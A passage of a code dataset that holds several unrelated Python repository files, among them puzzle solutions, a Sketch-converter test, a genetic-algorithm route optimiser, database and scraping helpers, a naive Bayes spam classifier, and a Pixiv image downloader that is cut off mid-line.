defaultdict\nclass Solution:\n def solveSudoku(self, board: List[List[str]]) -> None:\n \"\"\"\n Do not return anything, modify board in-place instead.\n \"\"\"\n def could_place(d, row, col):\n return not (d in rows[row] or d in cols[col] or d in boxes[box_index(row, col)])\n \n def place_number(d, row, col):\n rows[row][d] += 1\n cols[col][d] += 1\n boxes[box_index(row, col)][d] += 1\n board[row][col] = str(d)\n\n def place_next_number(row, col):\n \"\"\"\n Call backtrack function in recursion\n \"\"\"\n if col == N-1 and row == N-1:\n nonlocal sudoku_solved\n sudoku_solved = True\n else:\n if col == N-1:\n backtrack(row+1, 0)\n else:\n backtrack(row, col+1)\n \n def remove_number(d, row, col):\n del rows[row][d]\n del cols[col][d]\n del boxes[box_index(row, col)][d]\n board[row][col] = '.'\n \n def backtrack(row = 0, col = 0):\n if board[row][col] == '.':\n for d in 
range(1, 10):\n if could_place(d, row, col):\n place_number(d, row, col)\n place_next_number(row, col)\n if not sudoku_solved:\n remove_number(d, row, col)\n else:\n place_next_number(row, col)\n \n # box size\n n = 3\n # row size\n N = n * n\n # lambda function to compute box index\n box_index = lambda row, col: (row // n) * n + col // n\n # init row, columns and boxes\n rows = [defaultdict(int) for i in range(N)]\n cols = [defaultdict(int) for i in range(N)]\n boxes = [defaultdict(int) for i in range(N)]\n for i in range(N):\n for j in range(N):\n if board[i][j] != '.':\n d = int(board[i][j])\n place_number(d, i, j)\n \n sudoku_solved = False\n backtrack()\n\n\n def solveSudoku(self, board: List[List[str]]) -> None:\n \"\"\"\n Do not return anything, modify board in-place instead.\n \"\"\"\n m, n = 9, 9\n\n def isValid(r, c, n):\n for i in range(9):\n if board[r][i] == n:\n return False\n if board[i][c] == n:\n return False\n if board[r//3*3+i//3][c//3*3+i%3] == n:\n return False\n return True\n\n def backtrack(i, j):\n # if col is placed, place next row\n if j == 9:\n return backtrack(i+1, 0)\n # if all rows are placed, then solved\n if i == 9:\n return True\n # if cannot be placed, move to the next position\n if board[i][j] != \".\":\n return backtrack(i, j+1)\n \n # select from all possible candidates\n for n in range(1, 10):\n if not isValid(i, j, str(n)):\n continue\n board[i][j] = str(n)\n if backtrack(i, j+1):\n return True\n board[i][j] = \".\"\n return False\n\n return backtrack(0, 0)\n\n \n\n\n\n\n ","repo_name":"xiaofanc/leetcode","sub_path":"0037-sudoku-solver.py","file_name":"0037-sudoku-solver.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12963885111","text":"import pytest\nimport tempfile\nimport fig2sketch\nfrom zipfile import ZipFile\nimport json\nfrom converter import utils\nfrom unittest.mock import ANY\nimport re\n\n\n@pytest.fixture(scope=\"module\")\ndef sketch_doc(tmp_path_factory):\n out_path = f'{tmp_path_factory.mktemp(\"structure\")}/out.sketch'\n args = fig2sketch.parse_args([\"tests/data/structure.fig\", out_path, \"--salt=1234\"])\n fig2sketch.run(args)\n\n with ZipFile(out_path) as sketch:\n yield sketch\n\n\ndef test_user(sketch_doc):\n with sketch_doc.open(\"user.json\") as user_json:\n user = json.load(user_json)\n assert \"8F292FCA-49C0-4E31-957E-93FB2D1A7231\" in user\n assert \"A4E5259A-9CE6-49D9-B4A1-A8062C205347\" in user\n assert user[\"document\"] == {\n \"expandedSymbolPathsInSidebar\": [],\n \"expandedTextStylePathsInPopover\": [],\n \"libraryListCollapsed\": 0,\n \"pageListCollapsed\": 0,\n \"pageListHeight\": 200,\n }\n\n\ndef test_meta(sketch_doc):\n with sketch_doc.open(\"meta.json\") as meta_json:\n meta = json.load(meta_json)\n assert meta == {\n \"commit\": \"1899e24f63af087a9dd3c66f73b492b72c27c2c8\",\n \"pagesAndArtboards\": {\n \"8F292FCA-49C0-4E31-957E-93FB2D1A7231\": {\n \"name\": \"Page 1\",\n \"artboards\": {\n \"60CDCBD8-345A-4796-804B-C6A97C9C0587\": {\"name\": \"Groups\"},\n \"B4AC371F-D026-411F-985B-F92A86A928F6\": {\"name\": \"Symbols and images\"},\n },\n },\n \"A4E5259A-9CE6-49D9-B4A1-A8062C205347\": {\n \"name\": \"Symbols\",\n \"artboards\": {\"FA7E522B-5FF7-4393-AD4D-44C2A82CF837\": {\"name\": \"Component 1\"}},\n },\n },\n \"version\": 144,\n \"compatibilityVersion\": 99,\n \"coeditCompatibilityVersion\": 143,\n \"app\": \"com.bohemiancoding.sketch3\",\n \"autosaved\": 0,\n \"variant\": \"NONAPPSTORE\",\n 
\"created\": {\n \"commit\": \"1899e24f63af087a9dd3c66f73b492b72c27c2c8\",\n \"appVersion\": \"93\",\n \"build\": 155335,\n \"app\": \"com.bohemiancoding.sketch3\",\n \"compatibilityVersion\": 99,\n \"coeditCompatibilityVersion\": 143,\n \"version\": 144,\n \"variant\": \"NONAPPSTORE\",\n },\n \"saveHistory\": [\"NONAPPSTORE.155335\"],\n \"appVersion\": \"93\",\n \"build\": 155335,\n }\n\n\ndef test_document(sketch_doc):\n with sketch_doc.open(\"document.json\") as doc_json:\n doc = json.load(doc_json)\n assert doc[\"_class\"] == \"document\"\n assert doc[\"pages\"] == [\n {\n \"_class\": \"MSJSONFileReference\",\n \"_ref_class\": \"MSImmutablePage\",\n \"_ref\": \"pages/8F292FCA-49C0-4E31-957E-93FB2D1A7231\",\n },\n {\n \"_class\": \"MSJSONFileReference\",\n \"_ref_class\": \"MSImmutablePage\",\n \"_ref\": \"pages/A4E5259A-9CE6-49D9-B4A1-A8062C205347\",\n },\n ]\n assert doc[\"fontReferences\"] == [\n {\n \"_class\": \"fontReference\",\n \"do_objectID\": \"45406576-C7A2-4277-9C6E-B60F3D54ECC3\",\n \"fontData\": {\n \"_class\": \"MSJSONFileReference\",\n \"_ref_class\": \"MSFontData\",\n \"_ref\": \"fonts/07f64e2c2cfb24e6899ca67886d4ca9ed1c089c1\",\n },\n \"fontFamilyName\": \"Inter\",\n \"fontFileName\": \"Inter-Regular.ttf\",\n \"postscriptNames\": [\"Inter-Regular\"],\n \"options\": 3,\n }\n ]\n assert doc[\"userInfo\"] == {\n \"fig2sketch\": {\"can_detach\": True, \"salt\": \"31323334\", \"version\": ANY}\n }\n\n # Version looks like a version number\n assert re.match(r\"\\d+\\.\\d+\\.\\d+.*\", doc[\"userInfo\"][\"fig2sketch\"][\"version\"])\n\n\n@pytest.mark.parametrize(\n \"img\",\n [\n \"images/616d10a80971e08c6b43a164746afac1972c7ccc.png\",\n \"images/92e4d5e0c24ffd632c3db3264e62cc907c2f5e29\",\n \"fonts/07f64e2c2cfb24e6899ca67886d4ca9ed1c089c1\",\n ],\n)\ndef test_file_hashes(sketch_doc, img):\n with sketch_doc.open(img) as data:\n x = utils.generate_file_ref(data.read())\n assert x == img.split(\".\")[0].split(\"/\")[1]\n\n\ndef test_page(sketch_doc):\n with sketch_doc.open(\"pages/8F292FCA-49C0-4E31-957E-93FB2D1A7231.json\") as page_json:\n page = json.load(page_json)\n assert page[\"name\"] == \"Page 1\"\n assert len(page[\"layers\"]) == 2\n groups, syms = page[\"layers\"]\n\n # Groups artboard\n assert groups[\"_class\"] == \"artboard\"\n assert groups[\"name\"] == \"Groups\"\n assert len(groups[\"layers\"]) == 1\n\n g2 = groups[\"layers\"][0]\n assert g2[\"_class\"] == \"group\"\n assert len(g2[\"layers\"]) == 2\n\n g1 = g2[\"layers\"][1]\n assert g1[\"_class\"] == \"group\"\n assert len(g1[\"layers\"]) == 2\n\n r = g1[\"layers\"][0]\n assert r[\"_class\"] == \"rectangle\"\n assert \"layers\" not in r\n\n # Symbols artboard\n assert syms[\"_class\"] == \"artboard\"\n assert syms[\"name\"] == \"Symbols and images\"\n i1, i2, i3, jpg, png, svg = syms[\"layers\"]\n\n # Master instance\n assert i1[\"_class\"] == \"symbolInstance\"\n assert i1[\"overrideValues\"] == []\n\n # Instance with text override\n assert i2[\"_class\"] == \"symbolInstance\"\n assert i2[\"overrideValues\"] == [\n {\n \"_class\": \"overrideValue\",\n \"overrideName\": \"659F77C5-AF49-4288-8C6C-C1CE6684C282_stringValue\",\n \"value\": \"XYZ\",\n }\n ]\n\n # Instance with color override (detached)\n assert i3[\"_class\"] == \"group\"\n assert len(i3[\"layers\"]) == 2\n assert i3[\"layers\"][0][\"_class\"] == \"rectangle\"\n assert i3[\"layers\"][0][\"style\"][\"fills\"][0][\"color\"] == {\n \"_class\": \"color\",\n \"alpha\": 1.0,\n \"blue\": 0.0,\n \"green\": 0.0,\n \"red\": 1.0,\n }\n\n # JPG image\n assert 
jpg[\"_class\"] == \"rectangle\"\n assert jpg[\"style\"][\"fills\"][0][\"fillType\"] == 4\n assert (\n jpg[\"style\"][\"fills\"][0][\"image\"][\"_ref\"]\n == \"images/92e4d5e0c24ffd632c3db3264e62cc907c2f5e29\"\n )\n\n # PNG image\n assert png[\"_class\"] == \"rectangle\"\n assert png[\"style\"][\"fills\"][0][\"fillType\"] == 4\n assert (\n png[\"style\"][\"fills\"][0][\"image\"][\"_ref\"]\n == \"images/616d10a80971e08c6b43a164746afac1972c7ccc.png\"\n )\n\n # SVG image\n assert svg[\"_class\"] == \"group\"\n assert svg[\"layers\"][0][\"hasClippingMask\"] == True\n for l in svg[\"layers\"][1:]:\n assert l[\"_class\"] in [\"shapePath\", \"shapeGroup\"]\n\n\ndef test_symbols_page(sketch_doc):\n with sketch_doc.open(\"pages/A4E5259A-9CE6-49D9-B4A1-A8062C205347.json\") as page_json:\n page = json.load(page_json)\n assert page[\"name\"] == \"Symbols\"\n assert len(page[\"layers\"]) == 1\n\n symbol = page[\"layers\"][0]\n assert symbol[\"name\"] == \"Component 1\"\n assert symbol[\"_class\"] == \"symbolMaster\"\n\n assert len(symbol[\"layers\"]) == 2\n\n\ndef test_files(sketch_doc):\n assert sketch_doc.namelist() == [\n \"previews/preview.png\",\n \"images/616d10a80971e08c6b43a164746afac1972c7ccc.png\",\n \"images/92e4d5e0c24ffd632c3db3264e62cc907c2f5e29\",\n \"pages/8F292FCA-49C0-4E31-957E-93FB2D1A7231.json\",\n \"pages/A4E5259A-9CE6-49D9-B4A1-A8062C205347.json\",\n \"fonts/07f64e2c2cfb24e6899ca67886d4ca9ed1c089c1\",\n \"document.json\",\n \"user.json\",\n \"meta.json\",\n ]\n","repo_name":"sketch-hq/fig2sketch","sub_path":"tests/integration/test_structure.py","file_name":"test_structure.py","file_ext":"py","file_size_in_byte":7831,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"21"} +{"seq_id":"3058390604","text":"#!/usr/bin/python3\n\nfilename = \"13.input\"\nrd = open(filename, \"r\")\n\ncanDepart = int(rd.readline().strip())\nline = rd.readline().strip().split(\",\")\n\nminTime = -1\nresult = 0\nmaxStep = 0\nmaxIdx = 0\nd = {}\nidx = -1\n\nfor i in line:\n idx += 1\n if i == \"x\":\n continue\n busId = int(i)\n diff = canDepart % busId\n diff = busId - diff\n\n if busId > maxStep:\n maxStep = busId\n maxIdx = idx\n d[busId] = idx\n\n if minTime == -1 or diff < minTime:\n minTime = diff\n result = minTime * busId\n\n\nprint(result)\n\nprint(d)\n\nidx = 700000000000263\nidx = 760171380521445 + maxIdx # 939 minutes to calculate on Azure instance\ncnt = 0\nwhile True:\n found = True\n cnt += 1\n if cnt % 1000000 == 0:\n print(idx)\n #print(idx)\n\n for i in d:\n if (idx + d[i] - maxIdx) % i != 0:\n found = False\n break\n\n if found:\n print(idx - maxIdx)\n break\n\n idx += maxStep\n","repo_name":"mikenev/advent2020","sub_path":"13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12005919626","text":"N, M = map(int, input().split())\n\nP = []\n\n\"\"\"떼어낸 체스판\"\"\"\nnum = []\n\"\"\"카운트 횟수 리스트\"\"\"\ncounts = []\n\n\"\"\"한 글자씩 리스트에\"\"\"\nfor i in range(N):\n s = input()\n for w in range(len(s)):\n P.append(s[w])\n\n\ndef counting(numli):\n count = 0\n\n for j in range(8):\n for y in range(7):\n if numli[j][y] == numli[j][y + 1] and numli[j][y + 1] == 'B':\n numli[j][y + 1] = 'W'\n count += 1\n elif numli[j][y] == numli[j][y + 1] and numli[j][y + 1] == 'W':\n numli[j][y + 1] = 'B'\n count += 1\n \"\"\"행의 마지막 다음행 처음\"\"\"\n if y == 6 and j < 7:\n if numli[j][y + 1] != numli[j + 1][0]:\n numli[j + 1][0] = numli[j][y + 1]\n count 
+= 1\n \"\"\"If more than half the squares change, swapping black and white gives a smaller count\"\"\"\n if count > 32:\n count = 64 - count\n return count\n return count\n\n\nfor o in range(N - 7):\n for q in range(M - 7):\n num = []\n for z in range(8):\n num.append(P[0 + q + (o + z) * M: 8 + q + (o + z) * M])\n \"\"\"Cut out an 8 x 8 chessboard\"\"\"\n counts.append(counting(num))\nprint(min(counts))\n\n\n","repo_name":"hyunmingit/Python","sub_path":"Baekjoon/step10/체스판색칠.py","file_name":"체스판색칠.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4461680040","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\nimport requests\nimport os\nimport os.path\n\nclass Tryon1Pipeline(object):\n def process_item(self, item, spider):\n detailURL = item['imageUrl']\n\n imageUrl_others = item[\"imageUrlOthers\"]\n\n dir_path = '../../tmp/images/full/'\n\n if not os.path.exists(dir_path):\n os.makedirs(dir_path)\n\n image=requests.get(detailURL)\n\n path = dir_path + item['id'] + '.jpg'\n\n f=open(path,'wb')\n f.write(image.content)\n f.close()\n\n prefix = 'https://s3-us-west-1.amazonaws.com/maydayproject/item/'\n item['imageUrl'] = prefix + item['id'] + '.jpg'\n\n for index, url in enumerate(imageUrl_others):\n image = requests.get(url)\n # build each path from the directory so filenames do not accumulate\n path = dir_path + item['id'] + '_' + str(index)+'.jpg'\n f = open(path, 'wb')\n f.write(image.content)\n f.close()\n imageUrl_others[index] = prefix + item['id'] + '_' + str(index)+'.jpg'\n\n if os.path.isfile(path):\n return item","repo_name":"merlintang/crawler-images","sub_path":"crawler/tryon_1/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14628720653","text":"\r\nimport matplotlib.animation as animation\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport random as rnd\r\n\r\ndef clip(x):\r\n if x < 0:\r\n return (x + W)\r\n elif x >= W:\r\n return (x - W)\r\n else:\r\n return (x)\r\n\r\ndef gtypeToPtype(gtype):\r\n return gtype\r\n\r\ndef fitnessFunction(ptype):\r\n Route = 0\r\n for i in range(L-1):\r\n Route +=((Map[ptype[i]].x - Map[ptype[i+1]].x)**2+(Map[ptype[i]].y - Map[ptype[i+1]].y)**2)**0.5\r\n return Route\r\n\r\nclass Agent(object):\r\n def __init__(self, gtype):\r\n self.genotype = gtype[:]\r\n self.phenotype = self.genotype\r\n self.fitness = 0.0\r\n self.mute = False\r\n self.Cross = False\r\n\r\n # def ini(self):\r\n # self.mute = False\r\n # self.Cross = False\r\n\r\n def getOffspring(self):\r\n o = Agent(self.genotype)\r\n for i in range(L):\r\n if (rnd.random() < MUT):\r\n j = rnd.randint(1,L-1)\r\n o.genotype[i], o.genotype[j] = o.genotype[j], o.genotype[i]\r\n self.mute = True\r\n # o.genotype[i] = 1 - o.genotype[i]\r\n return (o)\r\n\r\n def develop(self, dfunc):\r\n self.phenotype= dfunc(self.genotype)\r\n\r\n def evaluate(self, efunc):\r\n self.fitness= efunc(self.genotype)\r\n\r\n\r\nclass City(object):\r\n def __init__(self):\r\n self.x = rnd.randint(0, W - 1)\r\n self.y = rnd.randint(0, W - 1)\r\n\r\n def randomwalk(self):\r\n self.x += rnd.randint(-1, 1)\r\n self.y += rnd.randint(-1, 1)\r\n self.x = clip(self.x)\r\n self.y = clip(self.y)\r\n\r\n def isOverlapped(self):\r\n for a in Map:\r\n if (a != self):\r\n if (a.x == self.x and a.y == self.y):\r\n return True\r\n return False\r\n\r\n def 
findNewSpace(self):\r\n self.randomwalk()\r\n while (self.isOverlapped()):\r\n self.randomwalk()\r\n\r\ndef selectAnAgentByTournament(pop,order):\r\n pop.sort(key = lambda x:x.fitness, reverse=False)\r\n return (pop[order])\r\n\r\ndef checkRepeat(i,split):\r\n for j in split:\r\n if j == i:\r\n return True\r\n return False\r\n\r\n\r\ndef crossover(a1, a2):\r\n # if (operator.eq(a1,a2)):\r\n # return a1,a2\r\n o1 = a1\r\n o2 = a2\r\n point1 = rnd.randint(1, L - 1)\r\n point2 = rnd.randint(point1, L)\r\n # print(\"p1:\"+str(point1)+\"p2:\"+str(point2))\r\n # print(\"F1\")\r\n # print(\"a1:\"+str(a1.genotype))\r\n # print(\"a2:\"+str(a2.genotype))\r\n # print(\"o1:\"+str(o1.genotype))\r\n # print(\"o2:\"+str(o2.genotype))\r\n\r\n for i in range(point1, point2):\r\n # print(str(o1.genotype[i]))\r\n # print(str(o2.genotype[i]))\r\n temp = o1.genotype[i]\r\n o1.genotype[i]=o2.genotype[i]\r\n o2.genotype[i]=temp\r\n # o1.genotype[i], o2.genotype[i] = o2.genotype[i], o1.genotype[i]\r\n # print(\"F2\")\r\n # print(\"o1:\"+str(o1.genotype))\r\n # print(\"o2:\"+str(o2.genotype))\r\n m1 = o1.genotype[point1:point2]\r\n m2 = o2.genotype[point1:point2]\r\n counter1 = 0\r\n counter2 = 0\r\n for i in range(0, L):\r\n sp1 = []\r\n sp2 = []\r\n if i < point1:\r\n sp1 = m1\r\n sp1 += (o1.genotype[:i])\r\n sp2 = m2\r\n sp2 += (o2.genotype[:i])\r\n elif i >= point2:\r\n sp1 += o1.genotype[:i]\r\n sp2 += o2.genotype[:i]\r\n else:\r\n continue\r\n while checkRepeat(o1.genotype[i], sp1):\r\n o1.genotype[i] = counter1\r\n counter1 += 1\r\n while checkRepeat(o2.genotype[i], sp2):\r\n o2.genotype[i] = counter2\r\n counter2 += 1\r\n # print(\"F3\")\r\n # print(\"o1:\"+str(o1.genotype))\r\n # print(\"o1:\"+str(o2.genotype))\r\n o1.Cross = True\r\n o2.Cross = True\r\n return o1, o2\r\n\r\n#N for Gene, L for city and the length\r\nSEED=101\r\nT = 100\r\nW = 30\r\nN = 30\r\nL = 20\r\nMUT= 0.05\r\nCROSS= 0.2\r\nrnd.seed(SEED)\r\n\r\n\r\nMap = []\r\nfor i in range(L):\r\n c = City()\r\n c.findNewSpace()\r\n Map.append(c)\r\n\r\npopulation = []\r\naverageFitness= []\r\nbestFitness= []\r\nMUT_Series = []\r\nbest = None\r\n\r\n# def check(gene):\r\n# for i in range(L):\r\n# for j in range(L):\r\n# if (gene[i]==gene[j] and i!=j):\r\n# return False\r\n# return True\r\n#\r\n# for g in population:\r\n# print(str(g.genotype))\r\n# print(str(check(g.genotype)))\r\n\r\ndef loop():\r\n for t in range(T):\r\n step()\r\n\r\ndef init():\r\n global population,best\r\n population.clear()\r\n best = None\r\n No = [i for i in range(L)]\r\n population = [Agent(rnd.sample(No, L)) for i in range(N)]\r\n best = population[0]\r\n\r\ndef step():\r\n global population,best\r\n best = population[0]\r\n for p in population:\r\n p.evaluate(fitnessFunction)\r\n if p.fitness < best.fitness:\r\n best = p\r\n\r\n newpop = []\r\n for i in range(int(N / 2)):\r\n n1 = selectAnAgentByTournament(population,i).getOffspring()\r\n n2 = selectAnAgentByTournament(population,i+1).getOffspring()\r\n\r\n s1 = n1\r\n s2 = n2\r\n\r\n if rnd.random() < CROSS:\r\n s1,s2 = crossover(n1, n2)\r\n newpop.append(s1)\r\n newpop.append(s2)\r\n\r\n population = newpop\r\n\r\n\r\ndef update():\r\n global bestFitness,averageFitness\r\n bestFitness.append(best.fitness)\r\n for p in population:\r\n p.evaluate(fitnessFunction)\r\n print(str(np.average([a.fitness for a in population])))\r\n averageFitness.append(np.average([a.fitness for a in population]))\r\n\r\n\r\nfor i in range(20):\r\n MUT = i/40\r\n MUT_Series.append(MUT)\r\n init()\r\n loop()\r\n update()\r\n\r\nfig = 
plt.figure()\r\nplt.plot(MUT_Series,bestFitness, label = \"Best\")\r\nplt.plot(MUT_Series,averageFitness, label = \"Average\")\r\nplt.xlabel(\"MUT\")\r\nplt.ylabel(\"average / best fitness\")\r\nplt.legend()\r\nplt.show()\r\n","repo_name":"Freyja-Leky/Python_Projects","sub_path":"Complex_Programming/SalesMan4Para.py","file_name":"SalesMan4Para.py","file_ext":"py","file_size_in_byte":5789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2890023332","text":"#!/usr/bin/env python\n# coding: utf-8\n# __author__ = 'wang tao'\n\nimport traceback\nimport aiomysql\nimport pymysql\n\n__all__ = [\n \"CustomAioMysql\"\n]\n\n\nclass CustomAioMysql:\n\n def __init__(self,\n host,\n database,\n user,\n password,\n loop=None,\n minsize=3, maxsize=5,\n return_dict=True,\n pool_recycle=7 * 3600,\n autocommit=True,\n charset=\"utf8mb4\", **kwargs):\n\n self.db_args = {\n 'host': host,\n 'db': database,\n 'user': user,\n 'password': password,\n 'minsize': minsize,\n 'maxsize': maxsize,\n 'charset': charset,\n 'loop': loop,\n 'autocommit': autocommit,\n 'pool_recycle': pool_recycle,\n }\n if return_dict:\n self.db_args['cursorclass'] = aiomysql.cursors.DictCursor\n if kwargs:\n self.db_args.update(kwargs)\n self.pool = None\n\n async def init_pool(self):\n \"\"\"\n Initialize the connection pool\n \"\"\"\n print(\"init pool\")\n self.pool = await aiomysql.create_pool(**self.db_args)\n\n async def query(self, query, *parameters, **kwparameters):\n \"\"\"\n Run the given query\n\n :return [row, ...]\n \"\"\"\n if not self.pool:\n await self.init_pool()\n async with self.pool.acquire() as conn:\n async with conn.cursor() as cur:\n try:\n await cur.execute(query, kwparameters or parameters)\n ret = await cur.fetchall()\n except pymysql.err.InternalError:\n await conn.ping()\n await cur.execute(query, kwparameters or parameters)\n ret = await cur.fetchall()\n return ret\n\n async def get(self, query, *parameters, **kwparameters):\n \"\"\"\n Run the given query\n\n :return row\n \"\"\"\n if not self.pool:\n await self.init_pool()\n async with self.pool.acquire() as conn:\n async with conn.cursor() as cur:\n try:\n await cur.execute(query, kwparameters or parameters)\n ret = await cur.fetchone()\n except pymysql.err.InternalError:\n await conn.ping()\n await cur.execute(query, kwparameters or parameters)\n ret = await cur.fetchone()\n return ret\n\n async def execute(self, query, *parameters, **kwparameters):\n \"\"\"\n Execute the given SQL statement\n \"\"\"\n if not self.pool:\n await self.init_pool()\n async with self.pool.acquire() as conn:\n async with conn.cursor() as cur:\n try:\n await cur.execute(query, kwparameters or parameters)\n except Exception:\n # https://github.com/aio-libs/aiomysql/issues/340\n await conn.ping()\n await cur.execute(query, kwparameters or parameters)\n return cur.lastrowid\n","repo_name":"wtfocus/code-demo","sub_path":"tornado_demo/models/custom_aiomysql.py","file_name":"custom_aiomysql.py","file_ext":"py","file_size_in_byte":3171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74096979894","text":"import tensorflow as tf\nimport tensorflow.keras.layers as layers\nfrom pathlib import Path\nimport numpy as np\n\nfrom ..tools import readLog\nbase_path = Path(__file__).parent\nfile_path = (base_path / \"../dataCollection/logs/flight2.txt\").resolve()\ndataSet = readLog.FlightDataSet(file_path)\n\nHISTORY_LENGTH=20\ndef getSingleTimeStepProcessor():\n input=layers.Input(shape=(11,))\n y=layers.Dense(units=10,activation='tanh')(input)\n 
y=layers.Dense(units=7,activation='tanh')(y)\n y=layers.Dense(units=3,activation='tanh')(y)\n y=layers.Dense(units=1)(y)\n return tf.keras.Model(input,y)\n\nstsp=getSingleTimeStepProcessor()\ndef getRNN_Model():\n elvHist=layers.Input(shape=(HISTORY_LENGTH,),name='elvHistory')\n pchHist=layers.Input(shape=(HISTORY_LENGTH,),name='pchHistory')\n stacked=tf.stack([elvHist,pchHist],axis=-1)\n lstm=layers.LSTM(11, return_sequences=True)(stacked)\n outputs=[]\n for i in range(HISTORY_LENGTH):\n tsInput=lstm[:,i]\n nextOut=stsp(tsInput)\n outputs.append(nextOut)\n unifiedOut=tf.concat(values=outputs,axis=1)\n return tf.keras.Model([elvHist,pchHist],unifiedOut)\nmodel=getRNN_Model()\nmodel.summary()\n\n\n\nSTEP = 0.1\ndef getSamples():\n startTime = 0\n pitchSer = []\n elvSer = []\n labels = []\n while startTime+STEP*HISTORY_LENGTH < dataSet.length:\n elvFrame = []\n pitchFrame = []\n for i in range(0, HISTORY_LENGTH):\n frame = dataSet[startTime+i*STEP]\n elvFrame.append(frame.rx.elv)\n pitchFrame.append(frame.basic.p)\n pitchSer.append(pitchFrame)\n elvSer.append(elvFrame)\n newLabel=pitchFrame.copy()\n newLabel.pop(0)\n newLabel.append(dataSet[startTime+STEP*HISTORY_LENGTH].basic.p)\n labels.append(newLabel)\n startTime += 1\n return elvSer, pitchSer, labels\n\nxdata, ydata, labels = getSamples()\n# xdata=tf.data.Dataset.from_tensors(xdata)\n# ydata=tf.data.Dataset.from_tensors(ydata)\nxdata = np.array(xdata)\nydata = np.array(ydata)\nlabels = np.array(labels)\nmodel.compile(\n optimizer=tf.keras.optimizers.Adam(),\n loss=tf.losses.mse\n)\nmodel.fit(\n x=[xdata, ydata],\n y=labels,\n batch_size=50,\n epochs=150\n)\n\n\ndef pred(elv, pitch):\n elv = np.array([elv])\n pitch = np.array([pitch])\n res = model.predict([elv, pitch])\n return np.asscalar(res[0,-1])\n\n\npitchSer = [0 for i in range(HISTORY_LENGTH)]\nelvSer = [0.5 for i in range(HISTORY_LENGTH)]\nwhile True:\n next = pred(elvSer, pitchSer)\n print(next)\n pitchSer.pop(0)\n elvSer.pop(0)\n pitchSer.append(next)\n elvSer.append(float(input()))","repo_name":"fynsta/Intelliplane","sub_path":"simulator/helper/models/rnnSim.py","file_name":"rnnSim.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"41078525117","text":"import MLAProject.Bayes.naiveBayes as nb\nimport re\nimport random\n\nSPAM_PATH = './res/mail/spam/%d.txt'\nHAM_PATH = './res/mail/ham/%d.txt'\n\n\ndef text_parse(big_string):\n list_of_tokens = re.split(r'\\W+', big_string)  # split on runs of non-word characters\n return [token.lower() for token in list_of_tokens if len(token) > 2]\n\n\ndef mail_classify_test(cv=5):\n doc_list = []\n class_list = []\n for i in range(1, 26):\n print(i)\n doc_list.append(text_parse(open(SPAM_PATH % i).read()))\n class_list.append(1)\n doc_list.append(text_parse(open(HAM_PATH % i).read()))\n class_list.append(0)\n vocab_list = nb.create_vocab_database(doc_list)\n total_cv_err_rate = 0\n for times in range(cv):\n train_set = [i for i in range(50)]\n test_set = []\n for i in range(10):\n rand_index = int(random.uniform(0, len(train_set)))\n test_set.append(train_set[rand_index])\n del (train_set[rand_index])\n train_mat = []\n train_class = []\n for i in train_set:\n train_mat.append(nb.input_transform_vocab(vocab_list, doc_list[i]))\n train_class.append(class_list[i])\n pw, pc = nb.train_naive_bayes(train_mat, train_class)\n err_count = 0\n for i in range(len(test_set)):\n result = nb.classify(pw, pc, nb.input_transform_vocab(vocab_list, doc_list[test_set[i]]))\n if result != class_list[test_set[i]]:\n 
print('error mail:', test_set[i])\n err_count += 1\n err_rate = err_count / float(len(test_set))\n print('Error rate: %.2f' % err_rate)\n total_cv_err_rate += err_rate\n total_cv_err_rate = total_cv_err_rate / cv\n print('Error rate after %d rounds of cross-validation: %.2f' % (cv, total_cv_err_rate))\n\n\nif __name__ == '__main__':\n mail_classify_test()\n\n","repo_name":"HanGaaaaa/MLAProject","sub_path":"Bayes/NBforMailClassify.py","file_name":"NBforMailClassify.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"10819344398","text":"from pixivpy3 import *\nfrom time import sleep\nimport os\nimport setting\n\n\n# Log in to the Pixiv API\napi = PixivAPI()\napi.login(setting.pixiv_id, setting.client_password)\naapi = AppPixivAPI()\n\n# Ask for the artist's page ID\nid_search = int(input('Enter the page ID of the artist to download. >>>'))\n\n# Maximum number of images to fetch\nworks = 300\n\nillustrator_id = api.users_works(id_search, per_page=works)\ntotal_works = illustrator_id.pagination.total\n\n# If the artist has published more works than the maximum,\n# cap the number fetched at the maximum\nif works < total_works:\n total_works = works\n\nillust = illustrator_id.response[0]\n\n# Specify the target tag\ntarget_tag = [str(input('Enter the tag to filter by. >>>'))]\n\n# Build the save directory path\nsaving_direcory_path = './Downloads/' + illust.user.name + '/'\nif not os.path.exists(saving_direcory_path):\n os.mkdir(saving_direcory_path)\nseparator = '------------------------------------------------------------'\n\nprint('Illustrator: {}'.format(illust.user.name))\nprint('Works number: {}'.format(total_works))\nprint(separator)\n\n# Start downloading\n\n\nfor work_no in range(0, total_works):\n try:\n illust = illustrator_id.response[work_no]\n\n if len(list(set(target_tag) & set(illust.tags))) == 0 and target_tag != []:\n continue\n\n print('Now: {0}/{1}'.format(work_no + 1, total_works))\n print('Title: {}'.format(illust.title))\n\n if os.path.exists(saving_direcory_path+str(illust.id)+'_p0.png') or os.path.exists(saving_direcory_path + str(illust.id) + '_p0.jpg'):\n # Skip if already downloaded\n print('Title:'+str(illust.title)+' has already been downloaded.')\n print(separator)\n sleep(1)\n continue\n\n if illust.is_manga:\n work_info = api.works(illust.id)\n for 